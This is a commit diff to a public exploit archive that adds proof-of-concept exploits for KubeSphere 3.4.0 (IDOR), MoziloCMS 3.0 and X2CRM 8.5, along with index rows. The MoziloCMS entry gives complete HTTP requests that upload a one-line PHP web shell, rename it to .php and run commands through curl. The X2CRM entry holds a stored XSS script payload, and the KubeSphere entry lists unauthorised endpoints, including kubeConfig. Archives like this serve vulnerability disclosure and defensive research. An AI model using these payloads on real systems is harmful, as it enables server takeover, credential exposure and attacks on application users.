DB: 2025-03-28

4 changes to exploits/shellcodes/ghdb KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MoziloCMS 3.0 - Remote Code Execution (RCE) X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
2025-03-28 00:16:32 +00:00 · 2025-03-28 00:16:32 +00:00 · 15b516383f
commit 15b516383f
parent f33b83aeea
4 changed files with 188 additions and 0 deletions
--- a/exploits/multiple/webapps/52097.NA
+++ b/exploits/multiple/webapps/52097.NA
@ -0,0 +1,26 @@
+# Exploit Title: IDOR Vulnerability in KubeSphere v3.4.0 & KubeSphere Enterprise v4.1.1
+# Date: 3 September
+# Exploit Author: Okan Kurtulus
+# Vendor Homepage: https://kubesphere.io
+# Software Link: https://github.com/kubesphere/kubesphere
+# Version: [>= 4.0.0 & < 4.1.3] , [>= 3.0.0 & < 3.4.1]
+# Tested on: Ubuntu 22.04
+# CVE : CVE-2024-46528
+
+1-) Log in to the system with a user who is not registered to any workspace (e.g., a "platform-regular" user who has limited authorization).
+
+Note: The authorization level of this user is as follows:
+"Cannot access any resources before joining a workspace."
+
+2-) After logging in with this user, it has been observed that cluster information, node information, users registered in the system, and other similar areas can be accessed without the user being registered to any workspace or cluster.
+
+Examples of accessible endpoints:
+
+http://xxx.xxx.xx.xx:30880/clusters/default/overview
+http://xxx.xxx.xx.xx:30880/clusters/default/nodes
+http://xxx.xxx.xx.xx:30880/access/accounts
+http://xxx.xxx.xx.xx:30880/clusters/default/monitor-cluster/ranking
+http://xxx.xxx.xx.xx:3 0880/clusters/default/monitor-cluster/resource
+http://xxx.xxx.xx.xx:30880/clusters/default/projects
+http://xxx.xxx.xx.xx:30880/clusters/default/nodes/minikube/pods
+http://xxx.xxx.xx.xx:30880/clusters/default/kubeConfig
--- a/exploits/php/webapps/52096.NA
+++ b/exploits/php/webapps/52096.NA
@ -0,0 +1,128 @@
+# Exploit Title: MoziloCMS 3.0 - Remote Code Execution (RCE) (Authenticated)
+# Date: 10/09/2024
+# Exploit Author: Secfortress (https://github.com/sec-fortress)
+# Vendor Homepage: https://mozilo.de/
+# Software Link:
+https://github.com/moziloDasEinsteigerCMS/mozilo3.0/archive/refs/tags/3.0.1.zip
+# Version: 3.0
+# Tested on: Debian
+# Reference: https://vulners.com/cve/CVE-2024-44871
+# CVE : CVE-2024-44871
+
+"""
+################
+# Description  #
+################
+
+MoziloCMS version 3.0 suffers from an arbitrary file upload vulnerability
+in the component "/admin/index.php" which allows an authenticated attacker
+to execute arbitrary code on the "Files" session by uploading a maliciously
+crafted .JPG file and subsequently renaming its extension to .PHP using the
+application's renaming function.
+
+#####################
+# PoC for webshell  #
+#####################
+
+Steps to Reproduce:
+
+1. Login as admin
+2. Go to the Files session by the left menu
+3. Create a .jpg file with it content having a php web shell
+4. Upload the file to the server via the upload icon and save
+5. Rename the file to .php on the web server and save
+6. Access webshell via this endpoint :
+http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php
+
+==========================
+Request 1 => Upload File: #
+==========================
+
+POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
+Firefox/115.0
+Accept: text/html, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data;
+boundary=---------------------------186462060042780927583949521447
+Content-Length: 607
+Origin: http://127.0.0.1
+DNT: 1
+Connection: close
+Referer:
+http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true
+Cookie: mozilo_editor_settings=true,false,mozilo,12px;
+3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep;
+PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b;
+MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+-----------------------------186462060042780927583949521447
+Content-Disposition: form-data; name="curent_dir"
+
+Willkommen
+-----------------------------186462060042780927583949521447
+Content-Disposition: form-data; name="chancefiles"
+
+true
+-----------------------------186462060042780927583949521447
+Content-Disposition: form-data; name="action"
+
+files
+-----------------------------186462060042780927583949521447
+Content-Disposition: form-data; name="files[]"; filename="revshell.jpg"
+Content-Type: image/jpeg
+
+<?=`$_GET[0]`?>
+
+-----------------------------186462060042780927583949521447--
+
+===========================
+Request 2 => Rename File: #
+===========================
+
+POST /mozilo3.0-3.0.1/admin/index.php HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101
+Firefox/115.0
+Accept: text/html, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 98
+Origin: http://127.0.0.1
+DNT: 1
+Connection: close
+Referer:
+http://127.0.0.1/mozilo3.0-3.0.1/admin/index.php?nojs=true&action=files&multi=true
+Cookie: mozilo_editor_settings=true,false,mozilo,12px;
+3f57633367583b9bf11d8e979ddc8e2b=gucvcppc86c62nnaefqjelq4ep;
+PHPSESSID=p7qq7p1t9sg9ke03mnrp48ir5b;
+MOZILOID_24b094c9c2b05ae0c5d9a85bc52a8ded=8civmp61qbc8hmlpg82tit1noo
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+action=files&newfile=revshell.php&orgfile=revshell.jpg&curent_dir=Willkommen&changeart=file_rename
+
+
+####################
+# Webshell access: #
+####################
+
+# Wenshell access via curl:
+
+curl
+http://127.0.0.1/mozilo3.0-3.0.1/kategorien/Willkommen/dateien/revshell.php?0=whoami
+
+# Output:
+
+www-data
+
+"""
--- a/exploits/php/webapps/52098.NA
+++ b/exploits/php/webapps/52098.NA
@ -0,0 +1,31 @@
+# Exploit Title: X2CRM v8.5 – Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 12 September 2024
+# Exploit Author: Okan Kurtulus
+# Vendor Homepage: https://x2engine.com/
+# Software Link: https://github.com/X2Engine/X2CRM
+# Version: X2CRM v8.5
+# Tested on: Ubuntu 22.04
+# CVE : CVE-2024-48120
+
+1-) Log in to the system with any user account. Navigate to the “Opportunities” section from the top menu and select “Create List.” In the “Name” field of the new screen, enter the malicious XSS payload and click “Create.”
+
+2-) Next, return to the “Opportunities” tab and click on “Lists” again. The stored XSS payload will be triggered.
+
+XSS Trigger Request:
+
+POST /x2crm/x2engine/index.php/opportunities/createList HTTP/1.1
+Host: 192.168.1.108
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 390
+Origin: http://192.168.1.108
+Connection: keep-alive
+Referer: http://192.168.1.108/x2crm/x2engine/index.php/opportunities/createList
+Cookie: PHPSESSID=uijrtnp42qqo29vfkb4v0sps3i; YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D; 5d8630d289284e8c14d15b14f4b4dc28=9d5b82f1240eb47cd73a20df560d9b3086847e33a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%223%22%3Bi%3A1%3Bs%3A4%3A%22test%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; LoginForm[username]=test; LoginForm[rememberMe]=1
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+
+YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&X2List%5Btype%5D=dynamic&X2List%5BassignedTo%5D=test2&X2List%5Bvisibility%5D=1&X2List%5BlogicType%5D=AND&X2List%5Battribute%5D%5B%5D=alternativeEmail&X2List%5Bcomparison%5D%5B%5D=%3D&X2List%5Bvalue%5D%5B%5D=test&yt0=Create
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -12014,6 +12014,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44487,exploits/multiple/webapps/44487.txt,"Kodi 17.6 - Persistent Cross-Site Scripting",2018-04-18,"Manuel García Cárdenas",webapps,multiple,,2018-04-18,2018-04-18,0,CVE-2018-8831,"Cross-Site Scripting (XSS)",,,,
 50521,exploits/multiple/webapps/50521.py,"KONGA 0.14.9 - Privilege Escalation",2021-11-15,"Fabricio Salomao",webapps,multiple,,2021-11-15,2021-11-15,0,,,,,http://www.exploit-db.comkonga-0.14.9.zip,
 34224,exploits/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery / HTML Injection",2010-06-29,TurboBorland,webapps,multiple,,2010-06-29,2014-08-01,1,,,,,,https://www.securityfocus.com/bid/41229/info
+52097,exploits/multiple/webapps/52097.NA,"KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)",2025-03-27,"Okan Kurtulus",webapps,multiple,,2025-03-27,2025-03-27,0,CVE-2024-46528,,,,,https://github.com/advisories/GHSA-p26r-gfgc-c47h
 49733,exploits/multiple/webapps/49733.txt,"Latrix 0.6.0 - 'txtaccesscode' SQL Injection",2021-04-01,cptsticky,webapps,multiple,,2021-04-01,2021-04-01,0,,,,,,
 48453,exploits/multiple/webapps/48453.txt,"LibreNMS 1.46 - 'search' SQL Injection",2020-05-11,Punt,webapps,multiple,,2020-05-11,2020-05-11,0,,,,,,
 49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
@ -23865,6 +23866,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 6194,exploits/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File",2008-08-02,Ams,webapps,php,,2008-08-01,,1,OSVDB-47327;CVE-2008-3589,,,,,
 8394,exploits/php/webapps/8394.txt,"moziloCMS 1.11 - Local File Inclusion / Full Path Disclosure / Cross-Site Scripting",2009-04-10,SirGod,webapps,php,,2009-04-09,2016-12-15,1,OSVDB-54907;CVE-2009-4209;OSVDB-54906;OSVDB-54905;OSVDB-54891;CVE-2009-1369;OSVDB-48644;CVE-2009-1368;CVE-2009-1367;CVE-2008-6126,,,,,
 48781,exploits/php/webapps/48781.txt,"moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)",2020-09-01,"Abdulkadir Kaya",webapps,php,,2020-09-01,2020-09-01,0,,,,,,
+52096,exploits/php/webapps/52096.NA,"MoziloCMS 3.0 - Remote Code Execution (RCE)",2025-03-27,"Olakojo Olaoluwa Joshua",webapps,php,,2025-03-27,2025-03-27,0,CVE-2024-44871,,,,,
 3761,exploits/php/webapps/3761.txt,"Mozzers SubSystem final - 'subs.php' Remote Code Execution",2007-04-18,Dj7xpl,webapps,php,,2007-04-17,2016-09-30,1,OSVDB-42404;CVE-2007-2169,,,,http://www.exploit-db.comSubSystem-final1-ns.zip,
 12219,exploits/php/webapps/12219.txt,"Mp3 Online Id Tag Editor - Remote File Inclusion",2010-04-14,indoushka,webapps,php,,2010-04-13,,0,,,,,,
 4650,exploits/php/webapps/4650.txt,"Mp3 ToolBox 1.0 Beta 5 - 'skin_file' Remote File Inclusion",2007-11-23,Crackers_Child,webapps,php,,2007-11-22,2016-10-20,1,OSVDB-39681;CVE-2007-6139,,,,http://www.exploit-db.commp3_toolbox_beta-5.zip,
@ -34308,6 +34310,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 7074,exploits/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,webapps,php,,2008-11-08,,1,OSVDB-49797;CVE-2008-6960,,,,,
 8408,exploits/php/webapps/8408.txt,"X10media Mp3 Search Engine < 1.6.2 - Admin Access",2009-04-13,THUNDER,webapps,php,,2009-04-12,2017-01-02,1,,,,,,
 28557,exploits/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",webapps,php,80,2013-09-25,2013-09-25,0,CVE-2013-5693;CVE-2013-5692;OSVDB-97366;OSVDB-97365,,,,,https://www.htbridge.com/advisory/HTB23172
+52098,exploits/php/webapps/52098.NA,"X2CRM 8.5 - Stored Cross-Site Scripting (XSS)",2025-03-27,"Okan Kurtulus",webapps,php,,2025-03-27,2025-03-27,0,CVE-2024-48120,,,,,
 51346,exploits/php/webapps/51346.txt,"X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)",2023-04-08,"Betul Denizler",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-48177,,,,,
 51345,exploits/php/webapps/51345.txt,"X2CRM v6.6/6.9 - Stored Cross-Site Scripting (XSS) (Authenticated)",2023-04-08,"Betul Denizler",webapps,php,,2023-04-08,2023-04-08,0,CVE-2022-48178,,,,,
 38323,exploits/php/webapps/38323.txt,"X2Engine 4.2 - Arbitrary File Upload",2015-09-25,Portcullis,webapps,php,80,2015-09-25,2015-09-25,0,CVE-2015-5074;OSVDB-128086,,,,http://www.exploit-db.comX2CRM-4.2.tar.gz,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2015-5074/